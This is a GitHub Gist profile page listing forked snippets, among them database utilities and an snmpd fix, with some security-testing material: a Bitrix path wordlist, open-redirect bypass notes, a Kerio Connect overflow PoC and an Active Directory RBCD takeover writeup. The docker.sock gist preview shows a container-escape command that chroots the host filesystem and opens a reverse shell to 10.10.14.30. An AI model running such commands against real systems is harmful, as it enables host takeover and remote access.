Skip to content

Instantly share code, notes, and snippets.

View pirenga's full-sized avatar

Mikhail pirenga

5 followers · 19 following
View GitHub Profile
@pirenga
pirenga / windows_and_office_kms_setup.adoc
Created March 13, 2025 14:48 — forked from jerodg/windows_and_office_kms_setup.adoc
Activate Windows and Office Using KMS Server

Microsoft Windows and Office KMS Setup

@pirenga
pirenga / hikvision rstp link
Created May 2, 2024 12:40
@pirenga
pirenga / gist:936514e6197f183723e765ede3b9b6b4
Created November 15, 2023 18:51 — forked from Bo0oM/gist:5d18e56847d2b1722bf5eedea853119b
Bitrix urls
This file has been truncated, but you can view the full file.
rss.php
coupon_activation.php
tools/bizproc_wf_settings.php
tools/seo_yandex.php
tools/seo_google.php
tools/get_catalog_menu.php
tools/sale_farm_check_print.php
tools/vote/uf.php
tools/vote/vote_chart.php
@pirenga
pirenga / open-redirect.md
Created October 25, 2023 13:50 — forked from 0xblackbird/open-redirect.md
Open redirect bypasses
@pirenga
pirenga / exploit-docker-sock.sh
Created October 23, 2023 10:38 — forked from PwnPeter/exploit-docker-sock.sh
Exploit docker.sock to mount root filesystem in a container
#!/bin/bash
# you can see images availables with
# curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
# here we have sandbox:latest
# command executed when container is started
# change dir to tmp where the root fs is mount and execute reverse shell
cmd="[\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i &>/dev/tcp/10.10.14.30/12348 0<&1'\\\"\"]"
@pirenga
pirenga / fix_snmpd_ia_addr.sh
Created October 5, 2023 05:49 — forked from luukverhoeven/fix_snmpd_ia_addr.sh
# Fix error on subcontainer 'ia_addr' insert (-1) - debian 9
#!/bin/bash
apt-get remove --purge snmpd
apt-get install snmpd
apt-get install snmp-mibs-downloader
sed -i "s|-Lsd|-LS4d|" /etc/default/snmpd
sed -i "s|-Lsd|-LS4d|" /lib/systemd/system/snmpd.service
systemctl daemon-reload
service snmpd restart
@pirenga
pirenga / kerioconnectPoC.md
Created February 7, 2023 16:12 — forked from Frycos/kerioconnectPoC.md

Kerio Connect - Stack Buffer Overflow in 2FASetup

@pirenga
pirenga / clickhouse-get-tables-size.sql
Created December 8, 2022 21:28 — forked from sanchezzzhak/clickhouse-get-tables-size.sql
clickhouse get tables size
SELECT table,
formatReadableSize(sum(bytes)) as size,
min(min_date) as min_date,
max(max_date) as max_date
FROM system.parts
WHERE active
GROUP BY table
@pirenga
pirenga / clickhousedump
Created December 8, 2022 20:31 — forked from inkrement/clickhousedump
dump all clickhouse databases and tables
#!/bin/bash
OUTDIR=.
while read -r db ; do
while read -r table ; do
if [ "$db" == "system" ]; then
echo "skip system db"
continue 2;
@pirenga
pirenga / Workstation-Takeover.md
Created June 15, 2022 09:30 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.